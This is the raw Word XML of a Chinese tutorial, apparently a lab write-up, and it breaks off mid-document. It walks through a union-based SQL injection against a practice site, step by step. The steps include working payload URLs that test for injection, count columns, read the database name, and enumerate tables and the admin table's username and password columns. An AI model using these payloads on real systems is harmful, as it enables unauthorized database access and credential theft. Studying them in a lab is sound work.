            <w:r w:rsidR="008A3086" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 1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>=1</w:t>
            </w:r>
            <w:r w:rsidR="009A4425" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">和 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>and 1=2</w:t>
            </w:r>
            <w:r w:rsidR="009A4425" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidR="009A4425" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>两个页面显示不一样，那么就说明存在注入了</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E15467" w14:textId="23265799" w:rsidR="00462E6F" w:rsidRPr="0069784F" w:rsidRDefault="00462E6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2C19E83" wp14:editId="68EADD4E">
                  <wp:extent cx="4871085" cy="286258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8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B5636" w14:textId="6FCDBD5A" w:rsidR="00462E6F" w:rsidRPr="0069784F" w:rsidRDefault="00462E6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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="647BD4A7" wp14:editId="7D9A09BE">
                  <wp:extent cx="4871085" cy="3416935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1C02" w14:textId="4A307C91" w:rsidR="00462E6F" w:rsidRPr="0069784F" w:rsidRDefault="00462E6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2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 xml:space="preserve">. </w:t>
            </w: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判断后台SQL的列数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4127B319" w14:textId="629E6563" w:rsidR="00462E6F" w:rsidRPr="0069784F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在概念部分我们知道union注入的关键点之一就是要判断原SQL的列数,这里我们可以通过order by n #来判断。n 表</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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示列</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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数,#表示注释,用于注释点order by n后面部分的SQL。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A47AA7" w14:textId="0DC1B701" w:rsidR="0069784F" w:rsidRPr="0069784F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order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 xml:space="preserve"> </w:t>
            </w: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by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 xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B96586F" w14:textId="7AA54EBF" w:rsidR="0069784F" w:rsidRPr="0069784F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noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32CADCB7" wp14:editId="2B821E8A">
                  <wp:extent cx="4871085" cy="3675380"/>
                  <wp:effectExtent l="0" t="0" r="5715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6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19426" w14:textId="62D11E3B" w:rsidR="0069784F" w:rsidRPr="0069784F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lastRenderedPageBreak/>
              <w:t>order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 xml:space="preserve"> </w:t>
            </w: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by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 xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B81994D" w14:textId="29FF7C08" w:rsidR="0069784F" w:rsidRPr="0069784F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noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="494607D0" wp14:editId="1EA6864A">
                  <wp:extent cx="4871085" cy="3549015"/>
                  <wp:effectExtent l="0" t="0" r="571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54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B1D8" w14:textId="2E4429D8" w:rsidR="0069784F" w:rsidRPr="0069784F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order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 xml:space="preserve"> </w:t>
            </w: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by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 xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08061DD6" w14:textId="347A1D77" w:rsidR="0069784F" w:rsidRPr="0069784F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noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BC93572" wp14:editId="011440BE">
                  <wp:extent cx="4871085" cy="3089910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BD153" w14:textId="3A61EB77" w:rsidR="0069784F" w:rsidRPr="0069784F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没有出现数据，说明</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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语句出错，可以判断原SQL的列数为2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBC1768" w14:textId="77777777" w:rsidR="0069784F" w:rsidRPr="0069784F" w:rsidRDefault="00462E6F" w:rsidP="0069784F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/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0053629E" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="0069784F" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>union注入探测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E2CF37" w14:textId="45556DFB" w:rsidR="0053629E" w:rsidRDefault="0069784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接下来我们使用 union select联合查询继续获取信息。union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示，即执行联合查询。需要注意在使用 union 查询的时候需要和主查询的列数相同，而我</w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>们之前已经知道了主查询列数为 2，接下来</w:t>
            </w:r>
            <w:r w:rsidR="000C7ABC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>需要判断回显位置。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7969006F" w14:textId="60520519" w:rsidR="000C7ABC" w:rsidRDefault="000C7ABC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r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r w:rsidR="006043CF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>复现</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>步骤1的漏洞可以屏蔽掉原数据库的查询</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15C19B10" w14:textId="4AC355C2" w:rsidR="000C7ABC" w:rsidRPr="006043CF" w:rsidRDefault="006D67B2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/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidR="006043CF" w:rsidRPr="006D67B2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http://pu2lh35s.ia.aq</w:t>
              </w:r>
              <w:r w:rsidR="006043CF" w:rsidRPr="006D67B2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l</w:t>
              </w:r>
              <w:r w:rsidR="006043CF" w:rsidRPr="006D67B2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ab.cn/index.php</w:t>
              </w:r>
              <w:r w:rsidR="000C7ABC" w:rsidRPr="006D67B2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?id=1+and+1=2+union+select+1,2+limit+0,+1#</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="693D8215" w14:textId="478B90CD" w:rsidR="000E07CF" w:rsidRDefault="000C7ABC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noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DBACE32" wp14:editId="42851C65">
                  <wp:extent cx="4871085" cy="3025140"/>
                  <wp:effectExtent l="0" t="0" r="5715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EE86B" w14:textId="36B3E60D" w:rsidR="000C7ABC" w:rsidRDefault="000C7ABC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r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>可以看出第二个位置可以插入</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>语句，接下来只需要改变第二个位置需要查询的目标即可得到要找的数据。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D315E3" w14:textId="7856AF0E" w:rsidR="0053629E" w:rsidRDefault="000C7ABC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rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0053629E" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="0053629E" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>库名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3086AB8A" w14:textId="45A8D363" w:rsidR="000C7ABC" w:rsidRPr="000C7ABC" w:rsidRDefault="000C7ABC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r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>将2位置修改为database</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E823A18" w14:textId="77777777" w:rsidR="006043CF" w:rsidRPr="006043CF" w:rsidRDefault="006043CF" w:rsidP="0053629E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r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instrText xml:space="preserve"> HYPERLINK "</w:instrText>
            </w:r>
            <w:r w:rsidRPr="006043C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instrText>http://pu2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+select+1,database()+limit+0,+1#</w:instrText>
            </w:r>
          </w:p>
          <w:p w14:paraId="04FB6A43" w14:textId="77777777" w:rsidR="006043CF" w:rsidRPr="00033CDA" w:rsidRDefault="006043CF" w:rsidP="0053629E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006043CF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F530487" wp14:editId="5EE19338">
                  <wp:extent cx="4871085" cy="3241675"/>
                  <wp:effectExtent l="0" t="0" r="571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24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instrText xml:space="preserve">" </w:instrText>
            </w:r>
            <w:r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fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00033CDA">
              <w:rPr>
                <w:rStyle w:val="a9"/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http://pu2lh35s.ia.aqlab.cn</w:t>
            </w:r>
            <w:r w:rsidRPr="00033CDA">
              <w:rPr>
                <w:rStyle w:val="a9"/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/</w:t>
            </w:r>
            <w:r w:rsidRPr="00033CDA">
              <w:rPr>
                <w:rStyle w:val="a9"/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index.php?id=1+and+1=2+union+select+1,database()+limit+0,+1#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A895C9" w14:textId="088BDFA5" w:rsidR="006043CF" w:rsidRPr="006043CF" w:rsidRDefault="006043CF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r w:rsidRPr="00033CDA">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ED9C601" wp14:editId="538DD51A">
                  <wp:extent cx="4871085" cy="3241675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24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cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>得到数据库库名为</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>maoshe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="568E9688" w14:textId="2A47AFAB" w:rsidR="007B4B83" w:rsidRDefault="006D67B2" w:rsidP="007B4B83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rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="007B4B83" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="007B4B83" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>所有的表名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3108CEF0" w14:textId="3BAEA644" w:rsidR="006D67B2" w:rsidRPr="006D67B2" w:rsidRDefault="006D67B2" w:rsidP="007B4B83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/>
                <w:i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Cs/>
              </w:rPr>
              <w:t>SQL语句为：</w:t>
            </w:r>
            <w:r w:rsidRPr="006D67B2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 xml:space="preserve">select </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D67B2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table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D67B2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 xml:space="preserve"> from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D67B2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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006D67B2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schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006D67B2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 xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D67B2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table_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D67B2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='</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D67B2">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:b/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>maoshe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D67B2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' limit 0,1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625B93FC" w14:textId="5E5627B3" w:rsidR="006D67B2" w:rsidRDefault="006D67B2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</w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidRPr="006D67B2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http://pu2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+select+1,table_name+from+information_schema.tables+where+table_schema=%27maoshe%27+limit+0,+1#</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2A3DF610" w14:textId="6E8C48A4" w:rsidR="006D67B2" w:rsidRDefault="006D67B2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C5C264" wp14:editId="3BBF4454">
                  <wp:extent cx="4871085" cy="2837180"/>
                  <wp:effectExtent l="0" t="0" r="5715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BB1D1" w14:textId="057AC74F" w:rsidR="006D67B2" w:rsidRDefault="006D67B2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rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>不断增加limit的偏移量即可得到所有的表名。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523CCA16" w14:textId="26E1D4E1" w:rsidR="006D67B2" w:rsidRDefault="006D67B2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267532" wp14:editId="086ADA95">
                  <wp:extent cx="4871085" cy="2804795"/>
                  <wp:effectExtent l="0" t="0" r="571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08A43" w14:textId="625B7524" w:rsidR="006D67B2" w:rsidRDefault="006D67B2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noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F79D21" wp14:editId="5353CF6E">
                  <wp:extent cx="4871085" cy="2889885"/>
                  <wp:effectExtent l="0" t="0" r="5715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9C935" w14:textId="3E20B95F" w:rsidR="006D67B2" w:rsidRPr="006D67B2" w:rsidRDefault="006D67B2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745219" wp14:editId="717E41BA">
                  <wp:extent cx="4871085" cy="2978150"/>
                  <wp:effectExtent l="0" t="0" r="571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45BC5" w14:textId="0BB5E9A2" w:rsidR="007B4B83" w:rsidRDefault="007B4B83" w:rsidP="0026483D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:noProof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此时即可得到所有的表名</w:t>
            </w:r>
            <w:r w:rsidR="001E37F8">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="001E37F8">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>admin，dirs，</w:t>
            </w:r>
            <w:r w:rsidR="001E37F8">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>news，xss</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD0A552" w14:textId="49E77AC3" w:rsidR="00AD416F" w:rsidRPr="001E37F8" w:rsidRDefault="00AD416F" w:rsidP="0026483D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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可以通过concat方法一次性获得所有表名，这里不再演示。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E879AC6" w14:textId="0C68D54C" w:rsidR="0026483D" w:rsidRDefault="001E37F8" w:rsidP="0026483D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>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0026483D" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="0026483D" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>每个表的字段</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCB7158" w14:textId="1FF87D07" w:rsidR="00AD416F" w:rsidRPr="00AD416F" w:rsidRDefault="00AD416F" w:rsidP="0026483D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Cs/>
              </w:rPr>
              <w:t>SQL语句：</w:t>
            </w:r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 xml:space="preserve">select </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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column_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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table_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">='security' and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AD416F"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  <w:t>='emails' limit 0,1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE1493E" w14:textId="1FC6BC7B" w:rsidR="00AD416F" w:rsidRPr="00AD416F" w:rsidRDefault="00AD416F" w:rsidP="0026483D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/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidRPr="00033CDA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http://pu2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+SELECT</w:t>
              </w:r>
              <w:r w:rsidRPr="00033CDA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+</w:t>
              </w:r>
              <w:r w:rsidRPr="00033CDA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1,column_name+from+information_schema.columns+where+table_schema=%27maoshe%27+and+table_name=%27admin%27+limit+0,</w:t>
              </w:r>
              <w:r w:rsidRPr="00033CDA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+</w:t>
              </w:r>
              <w:r w:rsidRPr="00033CDA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                  <w:b/>
                  <w:i/>
                  <w:iCs/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>1#</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="736B5063" w14:textId="7171D038" w:rsidR="00AD416F" w:rsidRPr="00AD416F" w:rsidRDefault="00AD416F" w:rsidP="0026483D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364DD993" wp14:editId="63A09F29">
                  <wp:extent cx="4871085" cy="2916555"/>
                  <wp:effectExtent l="0" t="0" r="571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91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40AC0" w14:textId="162D2B5E" w:rsidR="00AD416F" w:rsidRPr="00AD416F" w:rsidRDefault="00AD416F" w:rsidP="0026483D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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不断重复增加limit的偏移量即可得到所有字段（之后不再展示截图，对于不同表只需要对应改变表名即可）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE84529" w14:textId="5DD255E6" w:rsidR="007B4B83" w:rsidRPr="0069784F" w:rsidRDefault="0026483D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 w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>admin</w:t>
            </w:r>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>的字段有</w:t>
            </w:r>
            <w:r w:rsidR="00AD416F" w:rsidRPr="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Id</w:t>
            </w:r>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>，username，password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C70AFE" w14:textId="7BEEFF78" w:rsidR="009160D2" w:rsidRPr="0069784F" w:rsidRDefault="00E63E50" w:rsidP="009160D2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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>irs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>的字段有paths</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB08301" w14:textId="0DA27823" w:rsidR="00E63E50" w:rsidRPr="0069784F" w:rsidRDefault="00E63E50" w:rsidP="00E63E50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bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>news</w:t>
            </w:r>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
